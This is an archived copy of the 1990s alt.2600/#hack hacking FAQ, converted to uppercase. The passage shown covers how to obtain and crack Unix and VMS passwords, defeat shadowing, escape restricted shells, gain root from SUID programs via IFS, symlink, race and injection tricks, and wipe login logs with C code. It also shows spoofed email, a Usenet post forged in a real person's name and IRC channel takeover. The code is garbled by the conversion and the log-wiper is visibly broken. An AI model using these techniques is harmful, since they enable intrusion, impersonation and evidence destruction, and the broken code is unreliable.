💾 Archived View for spam.works › mirrors › textfiles › hacking › hack.faq captured on 2023-06-14 at 16:49:50.

View Raw

More Information

-=-=-=-=-=-=-

                                                                      #hack FAQ
                                   #HACK FAQ
         EDITORS NOTE: WELCOME TO BETA .008 OF THE ALT.2600/#HACK FAQ!
                                       
                    THE FAQ SUFFERED FROM A FLOPPY DISK CRASH.  I BELIEVE
                    I HAVE CORRECTED ALL ERRORS RESULTING FROM THE CRASH.
                      IF YOU FIND ANY THAT I MISSED, PLEASE E-MAIL ME.
                                       
                   THIS EDITION OF THE FAQ IS DEDICATED TO TARAN KING, WHO
                   HAS PUT IN MANY LONG HOURS KEEPING THE HTML VERSION OF
                                  THIS DOCUMENT UP TO DATE.
                                       
                                       
                 IF YOU HAVE A QUESTIONS REGARDING ANY OF THE TOPICS
                                       
                 COVERED IN THE FAQ, PLEASE DIRECT IT TO ALT.2600 OR
                                       
               #HACK.  PLEASE DO NOT E-MAIL ME WITH THEM, I'M GETTING
                                       
                                      SWAMPED.
                                       
                                       
                 IF YOUR COPY OF THE #HACK FAQ DOES NOT END WITH THE

                                                              #hack FAQ (24/25)
              LETTERS EOT ON A LINE BY THEMSELVES, YOU DO NOT HAVE THE
                                       
                                     ENTIRE FAQ.
                                       
                   THANKS GO OUT TO BORIS GINSBURGS FOR HIS WORK IN SPELL
                                      CHECKING THE FAQ!
                                       
                                       
                                       
                                       
                                       
                                       
                                   ** BETA **
                                       
                                       
                                       
                                       
                                 BETA REVISION .008
                                       
                                       
                                       
                                       

                                                              #hack FAQ (24/47)
                               ALT.2600/#HACK F.A.Q.
                                       
                                       
                                       
                                       
                                       
                                        BY
                                       
                                       
                                       
                                       
                                     VOYAGER
                                       
                                       
                                       
                                WILL@GNU.AI.MIT.EDU
                                       
                                       
                                       
                                       
                                       
                                   SYSOP OF

                                                              #hack FAQ (27/72)
                                   HACKER'S HAVEN
                                       
                                       
                                       
                                    (303)343-4053
                                       
                                       
                                       
                                       
                             WITH SPECIAL THANKS TO:
                                       
                                       
          A-FLAT, AL, ALEPH1, BLUESMAN, C-CURVE, EDISON, KCROW, MAJOR,
                                       
          PRESENCE, ROGUE AGENT, SBIN, TARAN KING, TOMES AND THESAINT.
                                       
                                       
                                       
                                       
                                 WE WORK IN THE DARK
                                       
                                       

                                                              #hack FAQ (27/94)
                                  WE DO WHAT WE CAN
                                       
                                       
                                 WE GIVE WHAT WE HAVE
                                       
                                       
                              OUR DOUBT IS OUR PASSION,
                                       
                                       
                             AND OUR PASSION IS OUR TASK
                                       
                                       
                           THE REST IS THE MADNESS OF ART.
                                       
                                       
                                       
                                       
                                       
                                -- HENRY JAMES
                                       
                                       
                                       

                                                             #hack FAQ (27/116)
                             SECTION A: COMPUTERS
                                       
                01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX?
                       02. HOW DO I CRACK UNIX PASSWORDS?
                         03. WHAT IS PASSWORD SHADOWING?
          N 04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED?
                               05. WHAT IS NIS/YP?
   N 06. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE?
                07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS?
                        08. HOW DO I CRACK VMS PASSWORDS?
                  09. HOW DO I BREAK OUT OF A RESTRICTED SHELL?
              10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM?
              11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS?
                           12. HOW DO I SEND FAKEMAIL?
                       13. HOW DO I FAKE POSTS TO USENET?
                        14. HOW DO I HACK CHANOP ON IRC?
          15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME?
       16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM?
                       U 17. WHAT IS ETHERNET SNIFFING?
                        18. WHAT IS AN INTERNET OUTDIAL?
                      19. WHAT ARE SOME INTERNET OUTDIALS?
                          U 20. WHAT IS THIS SYSTEM?

                                                             #hack FAQ (27/138)
                 U 21. WHAT ARE THE DEFAULT ACCOUNTS FOR XXX ?
                          U 22. WHAT PORT IS XXX ON?
                   23. WHAT IS A TROJAN/WORM/VIRUS/LOGIC BOMB?
                24. HOW CAN I PROTECT MYSELF FROM VIRII AND SUCH?
                           25. WHAT IS CRYPTOXXXXXXX?
                                26. WHAT IS PGP?
                              27. WHAT IS TEMPEST?
                       28. WHAT IS AN ANONYMOUS REMAILER?
             29. WHAT ARE THE ADDRESSES OF SOME ANONYMOUS REMAILERS?
                      30. HOW DO I DEFEAT COPY PROTECTION?
                                       
                                       
                             SECTION B: TELEPHONY
                                       
                             01. WHAT IS A RED BOX?
                          02. HOW DO I BUILD A RED BOX?
                  U 03. WHERE CAN I GET A 6.5536MHZ CRYSTAL?
                   04. WHICH PAYPHONES WILL A RED BOX WORK ON?
                             05. WHAT IS A BLUE BOX?
                          06. DO BLUE BOXES STILL WORK?
                            07. WHAT IS A BLACK BOX?
                      08. WHAT DO ALL THE COLORED BOXES DO?

                                                             #hack FAQ (27/160)
                         N 09. WHAT IS AN ANAC NUMBER?
                  U 10. WHAT IS THE ANAC NUMBER FOR MY AREA?
                         11. WHAT IS A RINGBACK NUMBER?
                  12. WHAT IS THE RINGBACK NUMBER FOR MY AREA?
                               13. WHAT IS A LOOP?
                         14. WHAT IS A LOOP IN MY AREA?
                          U 15. WHAT IS A CNA NUMBER?
            16. WHAT IS THE TELEPHONE COMPANY CNA NUMBER FOR MY AREA?
              N 17. WHAT ARE SOME NUMBERS THAT ALWAYS RING BUSY?
    N 18. WHAT ARE SOME NUMBERS THAT TEMPORARILY DISCONNECT PHONE SERVICE?
                              19. WHAT IS SCANNING?
                            20. IS SCANNING ILLEGAL?
                U 21. WHERE CAN I PURCHASE A LINEMAN'S HANDSET?
                       22. WHAT ARE THE DTMF FREQUENCIES?
                      N 23. WHAT ARE ALL OF THE * CODES?
             N 24. WHAT FREQUENCIES DO CORDLESS PHONES OPERATE ON?
                                       
                                       
                             SECTION C: RESOURCES
                                       
             U 01. WHAT ARE SOME FTP SITES OF INTEREST TO HACKERS?
            U 02. WHAT ARE SOME NEWSGROUPS OF INTEREST TO HACKERS?

                                                             #hack FAQ (27/182)
             03. WHAT ARE SOME TELNET SITES OF INTEREST TO HACKERS?
             04. WHAT ARE SOME GOPHER SITES OF INTEREST TO HACKERS?
    U 05. WHAT ARE SOME WORLD WIDE WEB (WWW) SITES OF INTEREST TO HACKERS?
             06. WHAT ARE SOME IRC CHANNELS OF INTEREST TO HACKERS?
               U 07. WHAT ARE SOME BBS'S OF INTEREST TO HACKERS?
                  08. WHAT BOOKS ARE AVAILABLE ON THIS SUBJECT?
             09. WHAT ARE SOME MAILING LISTS OF INTEREST TO HACKERS?
          U 10. WHAT ARE SOME PRINT MAGAZINES OF INTEREST TO HACKERS?
             11. WHAT ARE SOME ORGANIZATIONS OF INTEREST TO HACKERS?
         N 12. WHERE CAN I PURCHASE A MAGNETIC STRIPE ENCODER/DECODER?
                                       
                                SECTION D: 2600
                                       
                              01. WHAT IS ALT.2600?
                           02. WHAT DOES "2600" MEAN?
                03. ARE THERE ON-LINE VERSIONS OF 2600 AVAILABLE?
            04. I CAN'T FIND 2600 AT ANY BOOKSTORES.  WHAT CAN I DO?
   U 05. WHY DOES 2600 COST MORE TO SUBSCRIBE TO THAN TO BUY AT A NEWSSTAND?
                                       
                                       
                           SECTION E: MISCELLANEOUS
                                       

                                                             #hack FAQ (27/204)
                        U 01. WHAT DOES XXX STAND FOR?
          02. HOW DO I DETERMINE IF I HAVE A VALID CREDIT CARD NUMBER?
                  03. WHERE CAN I GET A COPY OF THE #HACK FAQ?
                     N 04. WHAT ARE THE ETHICS OF HACKING?
                                       
                                       
                                       
               U == UPDATED SINCE LAST RELEASE OF THE #HACK FAQ
                 N == NEW SINCE LAST RELEASE OF THE #HACK FAQ
                                       
                                       
                                       
                                       
                             SECTION A: COMPUTERS
                             ~~~~~~~~~~~~~~~~~~~~
                                       
               01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX?
                                       
     IN STANDARD UNIX THE PASSWORD FILE IS /ETC/PASSWD.  ON A UNIX SYSTEM
      WITH EITHER NIS/YP OR PASSWORD SHADOWING, MUCH OF THE PASSWORD DATA
                               MAY BE ELSEWHERE.
                                       

                                                             #hack FAQ (28/227)
                      02. HOW DO I CRACK UNIX PASSWORDS?
                                       
     CONTRARY TO POPULAR BELIEF, UNIX PASSWORDS CANNOT BE DECRYPTED.  UNIX
      PASSWORDS ARE ENCRYPTED WITH A ONE WAY FUNCTION.  THE LOGIN PROGRAM
      ENCRYPTS THE TEXT YOU ENTER AT THE "PASSWORD:" PROMPT AND COMPARES
      THAT ENCRYPTED STRING AGAINST THE ENCRYPTED FORM OF YOUR PASSWORD.
                                       
     PASSWORD CRACKING SOFTWARE USES WORDLISTS.  EACH WORD IN THE WORDLIST
        IS ENCRYPTED WITH EACH OF THE 4096 POSSIBLE SALT VALUES AND THE
      RESULTS ARE COMPARED TO THE ENCRYPTED FORM OF THE TARGET PASSWORD.
                                       
      THE BEST CRACKING PROGRAM FOR UNIX PASSWORDS IS CURRENTLY CRACK BY
        ALEC MUFFETT.  FOR PC-DOS, THE BEST PACKAGE TO USE IS CURRENTLY
                                 CRACKERJACK.
                                       
                                       
                        03. WHAT IS PASSWORD SHADOWING?
                                       
     PASSWORD SHADOWING IS A SECURITY SYSTEM WHERE THE ENCRYPTED PASSWORD
        FIELD OF /ETC/PASSWORD IS REPLACED WITH A SPECIAL TOKEN AND THE
     ENCRYPTED PASSWORD IS STORED IN A SEPARATE FILE WHICH IS NOT READABLE
                            BY NORMAL SYSTEM USERS.

                                                             #hack FAQ (29/250)
      TO DEFEAT PASSWORD SHADOWING ON MANY (BUT NOT ALL) SYSTEMS, WRITE A
        PROGRAM THAT USES SUCCESSIVE CALLS TO GETPWENT() TO OBTAIN THE
                                PASSWORD FILE.
                                       
                                   EXAMPLE:
                                       
                                   #INCLUDE
                                    MAIN()
                                       {
                               STRUCT PASSWD *P;
                              WHILE(P=GETPWENT())
          PRINTF("%S:%S:%D:%D:%S:%S:%S\N", P->PW_NAME, P->PW_PASSWD,
          P->PW_UID, P->PW_GID, P->PW_GECOS, P->PW_DIR, P->PW_SHELL);
                                       }
                                       
                                       
           04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED?
                                       
          UNIX                  PATH                            TOKEN
       -----------------------------------------------------------------
            AIX 3                 /ETC/SECURITY/PASSWD            !
                           OR             /TCB/AUTH/FILES//

                                                             #hack FAQ (29/272)
                   A/UX 3.0S             /TCB/FILES/AUTH/?/*
            BSD4.3-RENO           /ETC/MASTER.PASSWD              *
            CONVEXOS 10           /ETC/SHADPW                     *
            CONVEXOS 11           /ETC/SHADOW                     *
            DG/UX                 /ETC/TCB/AA/USER/               *
            EP/IX                 /ETC/SHADOW                     X
            HP-UX                 /.SECURE/ETC/PASSWD             *
            IRIX 5                /ETC/SHADOW                     X
            LINUX 0.99            /ETC/SHADOW                     *
            OSF/1                 /ETC/PASSWD[.DIR|.PAG]          *
                    SCO UNIX #.2.X        /TCB/AUTH/FILES//
       SUNOS4.1+C2           /ETC/SECURITY/PASSWD.ADJUNCT    ##USERNAME
                       SUNOS 5.0             /ETC/SHADOW
                                       
            SYSTEM V RELEASE 4.0  /ETC/SHADOW                     X
                SYSTEM V RELEASE 4.2  /ETC/SECURITY/* DATABASE
            ULTRIX 4              /ETC/AUTH[.DIR|.PAG]            *
            UNICOS                /ETC/UDB                        *
                                       
                                       
                              06. WHAT IS NIS/YP?
                                       

                                                             #hack FAQ (29/294)
    NIS (NETWORK INFORMATION SYSTEM) IN THE CURRENT NAME FOR WHAT WAS ONCE
       KNOWN AS YP (YELLOW PAGES).  THE PURPOSE FOR NIS IS TO ALLOW MANY
      MACHINES ON A NETWORK TO SHARE CONFIGURATION INFORMATION, INCLUDING
      PASSWORD DATA. NIS IS NOT DESIGNED TO PROMOTE SYSTEM SECURITY.  IF
     YOUR SYSTEM USES NIS YOU WILL HAVE A VERY SHORT /ETC/PASSWD FILE WITH
                         A LINE THAT LOOKS LIKE THIS:
                                       
                                   +::0:0:::
                                       
        TO VIEW THE REAL PASSWORD FILE USE THIS COMMAND "YPCAT PASSWD"
                                       
                                       
    05. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE?
                                       
      THE CHARACTERS ARE PASSWORD AGING DATA.  PASSWORD AGING FORCES THE
    USER TO CHANGE PASSWORDS AFTER A SYSTEM ADMINISTRATOR SPECIFIED PERIOD
     OF TIME.  PASSWORD AGING CAN ALSO FORCE A USER TO KEEP A PASSWORD FOR
                 A CERTAIN NUMBER OF WEEKS BEFORE CHANGING IT.
                                       
                                       ]
        ] SAMPLE ENTRY FROM /ETC/PASSWD WITH PASSWORD AGING INSTALLED:
                                       ]

                                                             #hack FAQ (29/316)
     ] WILL:5FG63FHD3D,M.Z8:9406:12:WILL SPENCER:/HOME/FSG/WILL:/BIN/BASH
                                       ]
                                       
     NOTE THE COMMA IN THE ENCRYPTED PASSWORD FIELD.  THE CHARACTERS AFTER
              THE COMMA ARE USED BY THE PASSWORD AGING MECHANISM.
                                       
                                       ]
                ] PASSWORD AGING CHARACTERS FROM ABOVE EXAMPLE:
                                       ]
                                    ] M.Z8
                                       ]
                                       
                THE FOUR CHARACTERS ARE INTERPRETED AS FOLLOWS:
                                       
       1: MAXIMUM NUMBER OF WEEKS A PASSWORD CAN BE USED WITHOUT CHANGING.
       2: MINIMUM NUMBER OF WEEKS A PASSWORD MUST BE USED BEFORE CHANGING.
      3&4: LAST TIME PASSWORD WAS CHANGED, IN NUMBER OF WEEKS SINCE 1970.
                                       
                     THREE SPECIAL CASES SHOULD BE NOTED:
                                       
      IF THE FIRST AND SECOND CHARACTERS ARE SET TO '..' THE USER WILL BE
      FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN.  THE

                                                             #hack FAQ (29/338)
     PASSWD PROGRAM WILL THEN REMOVE THE PASSWD AGING CHARACTERS, AND THE
       USER WILL NOT BE SUBJECTED TO PASSWORD AGING REQUIREMENTS AGAIN.
                                       
      IF THE THIRD AND FOURTH CHARACTERS ARE SET TO '..' THE USER WILL BE
    FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN. PASSWORD
     AGING WILL THEN OCCUR AS DEFINED BY THE FIRST AND SECOND CHARACTERS.
                                       
     IF THE FIRST CHARACTER (MAX) IS LESS THAN THE SECOND CHARACTER (MIN),
      THE USER IS NOT ALLOWED TO CHANGE HIS/HER PASSWORD.  ONLY ROOT CAN
                          CHANGE THAT USERS PASSWORD.
                                       
    IT SHOULD ALSO BE NOTED THAT THE SU COMMAND DOES NOT CHECK THE PASSWORD
        AGING DATA.  AN ACCOUNT WITH AN EXPIRED PASSWORD CAN BE SU'D TO
                 WITHOUT BEING FORCED TO CHANGE THE PASSWORD.
                                       
                                       
                                         PASSWORD AGING CODES
  +------------------------------------------------------------------------+
  |                                                                        |
  | CHARACTER:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  |    NUMBER:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  |                                                                        |

                                                             #hack FAQ (29/360)
  | CHARACTER:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B |
  |    NUMBER: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  |                                                                        |
  | CHARACTER:  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V |
  |    NUMBER: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  |                                                                        |
  | CHARACTER:  W  X  Y  Z                                                 |
  |    NUMBER: 60 61 62 63                                                 |
  |                                                                        |
  +------------------------------------------------------------------------+
                                       
                                       
               07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS?
                                       
       UNDER VMS, THE PASSWORD FILE IS SYS$SYSTEM:SYSUAF.DAT.  HOWEVER,
     UNLIKE UNIX, MOST USERS DO NOT HAVE ACCESS TO READ THE PASSWORD FILE.
                                       
                                       
                       08. HOW DO I CRACK VMS PASSWORDS?
                                       
       WRITE A PROGRAM THAT USES THE SYS$GETUAF FUNCTIONS TO COMPARE THE
     RESULTS OF ENCRYPTED WORDS AGAINST THE ENCRYPTED DATA IN SYSUAF.DAT.

                                                             #hack FAQ (30/383)
           TWO SUCH PROGRAMS ARE KNOWN TO EXIST, CHECK_PASSWORD AND
                                GUESS_PASSWORD.
                                       
                                       
                 09. HOW DO I BREAK OUT OF A RESTRICTED SHELL?
                                       
       ON POORLY IMPLEMENTED RESTRICTED SHELLS YOU CAN BREAK OUT OF THE
       RESTRICTED ENVIRONMENT BY RUNNING A PROGRAM THAT FEATURES A SHELL
        FUNCTION.  A GOOD EXAMPLE IS VI.  RUN VI AND USE THIS COMMAND:
                                       
                              :SET SHELL=/BIN/SH
                                       
                        THEN SHELL USING THIS COMMAND:
                                       
                                    :SHELL
                                       
                                       
             10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM?
                                       
                                1. CHANGE IFS.
                                       
      IF THE PROGRAM CALLS ANY OTHER PROGRAMS USING THE SYSTEM() FUNCTION

                                                             #hack FAQ (30/405)
    CALL, YOU MAY BE ABLE TO FOOL IT BY CHANGING IFS.  IFS IS THE INTERNAL
           FIELD SEPARATOR THAT THE SHELL USES TO DELIMIT ARGUMENTS.
                                       
             IF THE PROGRAM CONTAINS A LINE THAT LOOKS LIKE THIS:
                                       
                              SYSTEM("/BIN/DATE")
                                       
          AND YOU CHANGE IFS TO '/' THE SHELL WILL THEM INTERPRET THE
                              PROCEEDING LINE AS:
                                       
                                   BIN DATE
                                       
      NOW, IF YOU HAVE A PROGRAM OF YOUR OWN IN THE PATH CALLED "BIN" THE
           SUID PROGRAM WILL RUN YOUR PROGRAM INSTEAD OF /BIN/DATE.
                                       
                       TO CHANGE IFS, USE THIS COMMAND:
                                       
                    IFS='/';EXPORT IFS      # BOURNE SHELL
                       SETENV IFS '/'          # C SHELL
                     EXPORT IFS='/'          # KORN SHELL
                                       
                                       

                                                             #hack FAQ (30/427)
                           2. LINK THE SCRIPT TO -I
                                       
        CREATE A SYMBOLIC LINK NAMED "-I" TO THE PROGRAM.  RUNNING "-I"
     WILL CAUSE THE INTERPRETER SHELL (/BIN/SH) TO START UP IN INTERACTIVE
                 MODE.  THIS ONLY WORKS ON SUID SHELL SCRIPTS.
                                       
                                   EXAMPLE:
                                       
                                % LN SUID.SH -I
                                     % -I
                                       #
                                       
                                       
                          3. EXPLOIT A RACE CONDITION
                                       
     REPLACE A SYMBOLIC LINK TO THE PROGRAM WITH ANOTHER PROGRAM WHILE THE
                          KERNEL IS LOADING /BIN/SH.
                                       
                                   EXAMPLE:
                                       
                  NICE -19 SUIDPROG ; LN -S EVILPROG SUIDROOT
                                       

                                                             #hack FAQ (31/450)
                       4. SEND BAD INPUT TO THE PROGRAM.
                                       
       INVOKE THE NAME OF THE PROGRAM AND A SEPARATE COMMAND ON THE SAME
                                 COMMAND LINE.
                                       
                                   EXAMPLE:
                                       
                                 SUIDPROG ; ID
                                       
                                       
             11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS?
                                       
    EDIT /ETC/UTMP, /USR/ADM/WTMP AND /USR/ADM/LASTLOG. THESE ARE NOT TEXT
       FILES THAT CAN BE EDITED BY HAND WITH VI, YOU MUST USE A PROGRAM
                    SPECIFICALLY WRITTEN FOR THIS PURPOSE.
                                       
                                   EXAMPLE:
                                       
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE

                                                             #hack FAQ (31/472)
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                       #DEFINE WTMP_NAME "/USR/ADM/WTMP"
                         #DEFINE UTMP_NAME "/ETC/UTMP"
                    #DEFINE LASTLOG_NAME "/USR/ADM/LASTLOG"
                                       
                                    INT F;
                                       
                              VOID KILL_UTMP(WHO)
                                  CHAR *WHO;
                                       {
                               STRUCT UTMP UTMP_ENT;
                                       
                      IF ((F=OPEN(UTMP_NAME,O_RDWR))>=0) {
                 WHILE(READ (F, &UTMP_ENT, SIZEOF (UTMP_ENT))> 0 )
                  IF (!STRNCMP(UTMP_ENT.UT_NAME,WHO,STRLEN(WHO))) {
                          BZERO((CHAR *)&UTMP_ENT,SIZEOF( UTMP_ENT ));
                           LSEEK (F, -(SIZEOF (UTMP_ENT)), SEEK_CUR);
                            WRITE (F, &UTMP_ENT, SIZEOF (UTMP_ENT));
                                             }

                                                             #hack FAQ (31/494)
                                     CLOSE(F);
                                        }
                                       }
                                       
                              VOID KILL_WTMP(WHO)
                                  CHAR *WHO;
                                       {
                               STRUCT UTMP UTMP_ENT;
                                     LONG POS;
                                       
                                     POS = 1L;
                       IF ((F=OPEN(WTMP_NAME,O_RDWR))>=0) {
                                       
                                WHILE(POS != -1L) {
                LSEEK(F,-(LONG)( (SIZEOF(STRUCT UTMP)) * POS),L_XTND);
                  IF (READ (F, &UTMP_ENT, SIZEOF (STRUCT UTMP))= 0) {
                 LSEEK(F, (LONG)PWD->PW_UID * SIZEOF (STRUCT LASTLOG), 0);
                          BZERO((CHAR *)&NEWLL,SIZEOF( NEWLL ));
                        WRITE(F, (CHAR *)&NEWLL, SIZEOF( NEWLL ));
                                         CLOSE(F);
                                           }
                                       

                                                             #hack FAQ (31/516)
                           } ELSE PRINTF("%S: ?\N",WHO);
                                       }
                                       
                                MAIN(ARGC,ARGV)
                                   INT ARGC;
                                 CHAR *ARGV[];
                                       {
                                  IF (ARGC==2) {
                                KILL_LASTLOG(ARGV[1]);
                                  KILL_WTMP(ARGV[1]);
                                  KILL_UTMP(ARGV[1]);
                                  PRINTF("ZAP2!\N");
                                      } ELSE
                                PRINTF("ERROR.\N");
                                       }
                                       
                                       
                          12. HOW DO I SEND FAKEMAIL?
                                       
        TELNET TO PORT 25 OF THE MACHINE YOU WANT THE MAIL TO APPEAR TO
            ORIGINATE FROM.  ENTER YOUR MESSAGE AS IN THIS EXAMPLE:
                                       

                                                             #hack FAQ (31/538)
                               HELO BELLCORE.COM
                         MAIL FROM:VOYAGER@BELLCORE.COM
                        RCPT TO:PRESIDENT@WHITEHOUSE.GOV
                                      DATA
                                       
                                       
               PLEASE DISCONTINUE YOUR SILLY CLIPPER INITIATIVE.
                                       .
                                      QUIT
                                       
     ON SYSTEMS THAT HAVE RFC 931 IMPLEMENTED, SPOOFING YOUR "MAIL FROM:"
         LINE WILL NOT WORK.  TEST BY SENDING YOURSELF FAKEMAIL FIRST.
                                       
                                       
                      13. HOW DO I FAKE POSTS TO USENET?
                                       
              USE INEWS TO POST.  GIVE INEWS THE FOLLOWING LINES:
                                       
                                     FROM:
                                  NEWSGROUPS:
                                    SUBJECT:
                                  MESSAGE-ID:

                                                             #hack FAQ (31/560)
                                     DATE:
                                 ORGANIZATION:
                                       
         FOR A MODERATED NEWSGROUP, INEWS WILL ALSO REQUIRE THIS LINE:
                                       
                                   APPROVED:
                                       
                    THEN ADD YOUR POST AND TERMINATE WITH .
                                       
                                   EXAMPLE:
                                       
                               FROM: ERIC S. REAL
                            NEWSGROUPS: ALT.HACKERS
                   SUBJECT: PATHETIC BUNCH OF WANNABE LOSERS
                                  MESSAGE-ID:
                        DATE: FRI, 13 AUG 1994 12:15:03
                          ORGANIZATION: MORAL MAJORITY
                                       
      A PATHETIC BUNCH OF WANNABE LOSERS IS WHAT MOST OF YOU ARE, WITH NO
      RIGHT TO STEAL THE HONORABLE TITLE OF `HACKER' TO PUFF UP YOUR SILLY
            ADOLESCENT EGOS. GET STUFFED, GET LOST, AND GO TO JAIL.
                                       

                                                             #hack FAQ (36/587)
                                ERIC S. RAYMOND
                                       
                                       
                                       ^D
                                       
    NOTE THAT MANY SYSTEMS WILL APPEND AN ORIGINATOR: LINE TO YOUR MESSAGE
     HEADER, EFFECTIVELY REVEALING THE ACCOUNT FROM WHICH THE MESSAGE WAS
                                    POSTED.
                                       
                                       
                       14. HOW DO I HACK CHANOP ON IRC?
                                       
     FIND A SERVER THAT IS SPLIT FROM THE REST OF IRC AND CREATE YOUR OWN
     CHANNEL THERE USING THE NAME OF THE CHANNEL YOU WANT CHANOP ON.  WHEN
      THAT SERVER RECONNECTS TO THE NET, YOU WILL HAVE CHANOP ON THE REAL
     CHANNEL.  IF YOU HAVE SERVEROP ON A SERVER, YOU CAN CAUSE IT TO SPLIT
                                  ON PURPOSE.
                                       
                                       
         15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME?
                                       
      GET THE IRC CLIENT FROM CS.BU.EDU /IRC/CLIENTS.  LOOK AT THE SOURCE

                                                             #hack FAQ (36/609)
     CODE FILES IRC.C AND CTCP.C.  THE CODE YOU ARE LOOKING FOR IS FAIRLY
      EASY TO SPOT.  CHANGE IT. CHANGE THE USERNAME CODE IN IRC.C AND THE
        CTCP INFORMATION CODE IN CTCP.C.  COMPILE AND RUN YOUR CLIENT.
                                       
     HERE ARE THE DIFFS FROM A SAMPLE HACK OF THE IRC CLIENT.  YOUR CLIENT
     CODE WILL VARY SLIGHTLY DEPENDING ON WHAT IRC CLIENT VERSION YOU ARE
                                   RUNNING.
                                       
                   *** CTCP.C.OLD  WED FEB 10 10:08:05 1993
                   --- CTCP.C      FRI FEB 12 04:33:55 1993
                                ***************
                               *** 331,337 ****
                                       
                             STRUCT  PASSWD  *PWD;
                                       
                                 LONG    DIFF;
                                       
                                 INT     UID;
                              !       CHAR    C;
                                       
                                       
                                      /*

                                                             #hack FAQ (37/632)
              * SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS'
                               --- 331,337 ----
                                       
                             STRUCT  PASSWD  *PWD;
                                       
                                 LONG    DIFF;
                                       
                                 INT     UID;
                           !       CHAR    C, *FING;
                                       
                                       
                                      /*
                                       
              * SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS'
                                ***************
                               *** 348,354 ****
                                       
                            IF (UID != DAEMON_UID)
                                       
                                       {
                             #ENDIF /* DAEMON_UID */
                   !               IF (PWD = GETPWUID(UID))

                                                             #hack FAQ (39/656)
                                       {
                                       
                                       
                                       
                                 CHAR    *TMP;
                                       
                               --- 348,356 ----
                                       
                            IF (UID != DAEMON_UID)
                                       
                                       {
                             #ENDIF /* DAEMON_UID */
                !               IF (FING = GETENV("IRCFINGER"))
   !                       SEND_CTCP_REPLY(FROM, CTCP->NAME, FING, DIFF, C);
                 !               ELSE IF (PWD = GETPWUID(UID))
                                       
                                       
                                       {
                                       
                                       
                                       
                                 CHAR    *TMP;

                                                             #hack FAQ (40/679)
                   *** IRC.C.OLD   WED FEB 10 06:33:11 1993
                   --- IRC.C       FRI FEB 12 04:02:11 1993
                                ***************
                               *** 510,516 ****
                                       
                                       
                         MALLOC_STRCPY(&MY_PATH, "/");
                                       
                         IF (*REALNAME == NULL(CHAR))
                                       
                                       
                 STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN);
                     !       IF (*USERNAME == NULL(CHAR))
                                       
                                       {
                                       
                                       
                           IF (PTR = GETENV("USER"))
                                       
                                       
                                       
                       STRMCPY(USERNAME, PTR, NAME_LEN);

                                                             #hack FAQ (40/701)
                               --- 510,518 ----
                                       
                                       
                         MALLOC_STRCPY(&MY_PATH, "/");
                                       
                         IF (*REALNAME == NULL(CHAR))
                                       
                                       
                 STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN);
                     !       IF (PTR = GETENV("IRCUSER"))
               !               STRMCPY(USERNAME, PTR, NAME_LEN);
                   !       ELSE IF (*USERNAME == NULL(CHAR))
                                       
                                       {
                                       
                                       
                           IF (PTR = GETENV("USER"))
                                       
                                       
                                       
                       STRMCPY(USERNAME, PTR, NAME_LEN);
                                       

                                                             #hack FAQ (41/724)
      16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM?
                                       
    THESE DIRECTORIES ARE OFTEN USED BY PEOPLE TRYING TO HIDE INFORMATION,
                    MOST OFTEN WAREZ (COMMERCIAL SOFTWARE).
                                       
      THERE ARE SEVERAL THINGS YOU CAN DO TO DETERMINE WHAT THESE STRANGE
      CHARACTERS ARE.  ONE IS TO USE THE ARGUMENTS TO THE LS COMMAND THAT
                    CAUSE LS TO GIVE YOU MORE INFORMATION:
                                       
                           FROM THE MAN PAGE FOR LS:
                                       
            -F   CAUSES DIRECTORIES TO BE MARKED WITH A TRAILING ``/'',
                                       
            EXECUTABLE FILES TO BE MARKED WITH A TRAILING ``*'', AND
                                       
           SYMBOLIC LINKS TO BE MARKED WITH A TRAILING ``@'' SYMBOL.
                                       
        -Q   FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN FILENAMES AS THE
                                       
                                CHARACTER ``?''.
                                       
            -B   FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN THE \DDD

                                                             #hack FAQ (42/747)
                              NOTATION, IN OCTAL.
                                       
     PERHAPS THE MOST USEFUL TOOL IS TO SIMPLY DO AN "LS -AL FILENAME" TO
       SAVE THE DIRECTORY OF THE REMOTE FTP SITE AS A FILE ON YOUR LOCAL
      MACHINE.  THEN YOU CAN DO A "CAT -T -V -E FILENAME" TOO SEE EXACTLY
                   WHAT THOSE BIZARRE LITTLE CHARACTERS ARE.
                                       
                          FROM THE MAN PAGE FOR CAT:
                                       
          -V  CAUSES NON-PRINTING CHARACTERS (WITH THE EXCEPTION OF TABS,
                                       
